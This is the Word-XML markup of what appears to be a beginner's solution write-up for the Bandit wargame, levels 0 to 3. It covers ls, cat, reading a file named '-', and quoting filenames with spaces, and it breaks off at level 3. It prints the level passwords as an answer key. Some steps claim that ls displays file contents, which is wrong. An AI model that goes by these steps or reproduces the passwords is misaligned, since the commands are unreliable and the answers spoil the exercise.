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DD77" w14:textId="571EEA18" w:rsidR="00C75B95" w:rsidRPr="00E255CC" w:rsidRDefault="00C75B95" w:rsidP="001E43F7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C75B95">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C930540" w14:textId="6902636C" w:rsidR="00C75B95" w:rsidRPr="004F2D5D" w:rsidRDefault="00C75B95" w:rsidP="001E43F7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4F2D5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0360137B" w14:textId="2691DEC0" w:rsidR="001E43F7" w:rsidRPr="00E255CC" w:rsidRDefault="002662D2" w:rsidP="00997DD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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I wanted to display the folder’s files. For doing so I entered the command </w:t>
      </w:r>
      <w:r w:rsidR="00C75B95" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. There was a file called </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“readme”</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E926F" w14:textId="09B6B9EC" w:rsidR="00C75B95" w:rsidRPr="00E255CC" w:rsidRDefault="004C0F5F" w:rsidP="001E43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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> displaying file context, I entered the command </w:t>
      </w:r>
      <w:r w:rsidR="00C75B95" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat readme</w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="00C75B95" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was inside the file</w:t>
      </w:r>
      <w:r w:rsidR="00C75B95" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C75B95" w:rsidRPr="00E255CC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boJ9jbbUNNfktd78OOpsqOltutMc3MY1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07080BF8" w14:textId="5ABFE077" w:rsidR="00C75B95" w:rsidRPr="00E255CC" w:rsidRDefault="00C75B95" w:rsidP="001E43F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E1317FD" w14:textId="3630BF89" w:rsidR="00C75B95" w:rsidRPr="00E255CC" w:rsidRDefault="00C75B95" w:rsidP="001E43F7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E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52069D" w14:textId="57F0BBB5" w:rsidR="00C75B95" w:rsidRPr="00E255CC" w:rsidRDefault="002662D2" w:rsidP="001E43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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Like before I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC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Pr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for displaying folder’s file. There was a file called </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00923084">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–“</w:t>
      </w:r>
      <w:r w:rsidR="004C0F5F" w:rsidRPr="00923084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30D1E938" w14:textId="0A267B6A" w:rsidR="002662D2" w:rsidRPr="00E255CC" w:rsidRDefault="004C0F5F" w:rsidP="001E43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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For displaying the file context, I entered the command </w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat -</w:t>
      </w:r>
      <w:r w:rsidR="002662D2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nothing was displayed, but in the same it didn’t finish reading the file. When I type some letters and press enter, they were printed </w:t>
      </w:r>
      <w:r w:rsidR="004202AE" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>again</w:t>
      </w:r>
      <w:r w:rsidR="008432C5" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D666337" w14:textId="451B3002" w:rsidR="001E43F7" w:rsidRPr="00E255CC" w:rsidRDefault="008432C5" w:rsidP="00997DD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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I also entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC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file – </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for displaying file type, and </w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I type some </w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>letters and pressed enter,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I saw that the file type is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/dev/stdin: ASCII text</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A38EB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E233C2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fter reading </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://unix.stackexchange.com/questions/16357/usage-of-dash-in-place-of-a-filename</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I understand </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that th</w:t>
      </w:r>
      <w:r w:rsidR="00E233C2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cat command treat </w:t>
      </w:r>
      <w:r w:rsidR="00E233C2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E233C2" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/dev/stdin file</w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="00B67D13" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is the standard input file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB975B0" w14:textId="45A0FBE6" w:rsidR="008432C5" w:rsidRPr="00E255CC" w:rsidRDefault="004202AE" w:rsidP="001E43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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">or displaying </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BA203A" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file (and not stdin)</w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BA203A" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I entered the command </w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls ./-</w:t>
      </w:r>
      <w:r w:rsidR="00BA203A" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he password was </w:t>
      </w:r>
      <w:r w:rsidR="005B24EC" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inside the file</w:t>
      </w:r>
      <w:r w:rsidR="00424FB8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EB7CF0" w:rsidRPr="00E255CC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CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D4073" w14:textId="61B68B44" w:rsidR="002662D2" w:rsidRPr="00E255CC" w:rsidRDefault="002662D2" w:rsidP="001E43F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3098B1E" w14:textId="39096699" w:rsidR="00446235" w:rsidRPr="00E255CC" w:rsidRDefault="00446235" w:rsidP="001E43F7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E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D76BDAC" w14:textId="3F0DA8C6" w:rsidR="001E43F7" w:rsidRPr="00E255CC" w:rsidRDefault="009C23E0" w:rsidP="00997DD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55CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I wanted to display the folder’s files. For doing so I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. There was a file called </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“spaces in this filename”</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1CB88" w14:textId="3EDB7DFF" w:rsidR="00446235" w:rsidRDefault="009C23E0" w:rsidP="001E43F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E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For displaying the file context, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls “spaces in this filename”</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with the </w:t>
      </w:r>
      <w:r w:rsidR="001C575D" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>quotation marks</w:t>
      </w:r>
      <w:r w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="001F4A1A" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  The password was inside the file:</w:t>
      </w:r>
      <w:r w:rsidR="00E255CC" w:rsidRPr="00E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4A1A" w:rsidRPr="00E255CC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UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D6819" w14:textId="370F4400" w:rsidR="004F2D5D" w:rsidRDefault="004F2D5D" w:rsidP="001E43F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FB08153" w14:textId="361390A8" w:rsidR="004F2D5D" w:rsidRDefault="004F2D5D" w:rsidP="001E43F7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4F2D5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F35E03" w14:textId="3EFC5AE2" w:rsidR="00FD2052" w:rsidRDefault="00FD2052" w:rsidP="001E43F7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displaying folder </w:t>
      </w:r>
      <w:r w:rsidR="008A38EB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>context,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
